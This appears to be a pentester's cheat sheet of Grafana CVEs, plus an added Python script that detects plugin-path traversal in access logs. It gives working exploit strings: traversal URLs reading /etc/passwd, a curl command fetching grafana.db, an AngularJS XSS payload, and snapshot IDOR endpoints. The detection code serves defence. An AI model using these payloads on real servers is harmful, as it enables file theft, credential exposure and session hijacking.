What is Grafana? Open-source analytics and dashboarding platform with alerting.


Default path for db: /var/lib/grafana/grafana.db


📌 CVE-2024-9264 (v11): <https://github.com/nollium/CVE-2024-9264>


📌 CVE-2021-43798: Directory Traversal (v8.0 - 8.3). Reads local files via path traversal in the plugin asset routes.

<http://target/public/plugins/alertlist/../../../../../../../../etc/passwd>

# try to download the database (the Grafana SQLite db at its default path)
curl 'http://data.vl:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' --path-as-is --output grafana.db
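As an added defensive example (not part of the original notes), a small log check for the traversal pattern above: it parses constructed Common Log Format lines (sample data, not real traffic), URL-decodes each request path and flags any request under /public/plugins/ that resolves outside its plugin directory. The log format and record fields are assumptions.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Constructed sample access-log lines in Common Log Format (assumed proxy/front-end log; not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:01:02 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1432
10.0.0.5 - - [12/May/2024:10:01:09 +0000] "GET /public/plugins/zipkin/..%2F..%2F..%2F..%2Fvar/lib/grafana/grafana.db HTTP/1.1" 200 671744
10.0.0.7 - - [12/May/2024:10:02:11 +0000] "GET /public/plugins/alertlist/img/icn-singlestat-panel.svg HTTP/1.1" 200 1200
10.0.0.7 - - [12/May/2024:10:02:15 +0000] "GET /api/snapshots HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
PLUGIN_PREFIX = "/public/plugins/"

def escapes_plugin_dir(raw_path: str) -> bool:
    """True if a /public/plugins/<plugin>/<file> request resolves outside that plugin's directory."""
    # Decode twice so single- and double-URL-encoded '../' segments are both normalised.
    path = unquote(unquote(raw_path.split("?", 1)[0]))
    if not path.startswith(PLUGIN_PREFIX):
        return False
    rest = path[len(PLUGIN_PREFIX):]
    if "/" not in rest:
        return False
    _plugin, rel = rest.split("/", 1)
    # normpath collapses '..' against preceding segments; any '..' left at the front climbs above the plugin root.
    resolved = normpath(rel)
    return resolved == ".." or resolved.startswith("../")

def find_traversal_attempts(log_text: str) -> list:
    """Return one record per request that escapes its plugin directory (served=True means the file came back 200)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and escapes_plugin_dir(m["path"]):
            hits.append({
                "src": m["src"],
                "time": m["ts"],
                "decoded_path": unquote(unquote(m["path"])),
                "served": m["status"] == "200",
            })
    return hits

if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with served=True on a file outside the plugin tree is the signal to treat as a confirmed read, not just an attempt; the fix is upgrading past the affected 8.x range.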


📌 CVE-2020-11110: Stored XSS via originalUrl. JS injected into a snapshot's originalUrl runs when a user clicks "Open Original Dashboard".

<http://target/api/snapshots>


📌 CVE-2021-41174: AngularJS XSS (unauthenticated). AngularJS template injection in the snapshot URL executes JS in the victim's browser.

<http://target/dashboard/snapshot/{{constructor.constructor('alert(1)')()}}?orgId=1>

📌 CVE-2021-39226: Snapshot IDOR / deletion. The snapshot key is exposed, so snapshots can be viewed or deleted (unauthenticated when public_mode=true).

<http://target/api/snapshots/:key>